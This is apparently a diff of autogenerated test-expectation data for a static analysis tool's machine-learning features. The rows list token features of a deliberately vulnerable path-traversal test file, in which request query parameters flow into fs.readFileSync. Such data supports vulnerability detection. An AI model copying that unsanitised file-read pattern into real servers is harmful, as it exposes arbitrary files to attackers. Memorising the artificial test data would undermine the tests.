http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:44:29:44:52 | pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:44:29:44:52 | pathMod ... e(path) | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:44:40:44:46 | extname | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:40:44:46 | extname | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:40:44:46 | extname | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:44:40:44:46 | extname | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:44:40:44:46 | extname | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:44:48:44:51 | path | CalleeFlexibleAccessPath | pathModule.extname | | autogenerated/TaintedPath/TaintedPath.js:44:48:44:51 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:44:48:44:51 | path | calleeImports | path | @@ -4980,6 +59565,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:44:48:44:51 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:44:48:44:51 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:44:48:44:51 | path | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:51 | exceptional return of res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:51 | exceptional return of res.wri ... path))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:51 | exceptional return of res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:51 | exceptional return of res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:51 | exceptional return of res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:51 | res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:51 | res.wri ... path))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:51 | res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:51 | res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:46:3:46:51 | res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:46:7:46:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:7:46:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:7:46:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:46:7:46:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:46:7:46:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:50 | exceptional return of fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:50 | exceptional return of fs.read ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:50 | exceptional return of fs.read ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:50 | exceptional return of fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:46:13:46:50 | exceptional return of fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:46:13:46:50 | fs.read ... (path)) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:46:13:46:50 | fs.read ... (path)) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:46:13:46:50 | fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | @@ -4988,6 +59613,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:46:13:46:50 | fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:46:13:46:50 | fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:46:13:46:50 | fs.read ... (path)) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:46:16:46:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:16:46:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:16:46:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:46:16:46:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:46:16:46:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:38 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:38 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:38 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:38 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:38 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:43 | pathModule.join | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:43 | pathModule.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:43 | pathModule.join | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:43 | pathModule.join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:43 | pathModule.join | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:49 | exceptional return of pathMod ... n(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:49 | exceptional return of pathMod ... n(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:49 | exceptional return of pathMod ... n(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:49 | exceptional return of pathMod ... n(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:46:29:46:49 | exceptional return of pathMod ... n(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:46:29:46:49 | pathMod ... n(path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:46:29:46:49 | pathMod ... n(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:46:29:46:49 | pathMod ... n(path) | calleeImports | fs | @@ -4997,6 +59642,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:46:29:46:49 | pathMod ... n(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:46:29:46:49 | pathMod ... n(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:46:29:46:49 | pathMod ... n(path) | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:46:40:46:43 | join | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:40:46:43 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:46:40:46:43 | join | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:46:40:46:43 | join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:46:40:46:43 | join | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:46:45:46:48 | path | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/TaintedPath.js:46:45:46:48 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:46:45:46:48 | path | calleeImports | path | @@ -5006,6 +59656,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:46:45:46:48 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:46:45:46:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:46:45:46:48 | path | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:60 | exceptional return of res.wri ... h, z))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:60 | exceptional return of res.wri ... h, z))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:60 | exceptional return of res.wri ... h, z))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:60 | exceptional return of res.wri ... h, z))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:60 | exceptional return of res.wri ... h, z))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:60 | res.wri ... h, z))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:60 | res.wri ... h, z))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:60 | res.wri ... h, z))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:60 | res.wri ... h, z))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:48:3:48:60 | res.wri ... h, z))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:48:7:48:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:7:48:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:48:7:48:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:48:7:48:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| 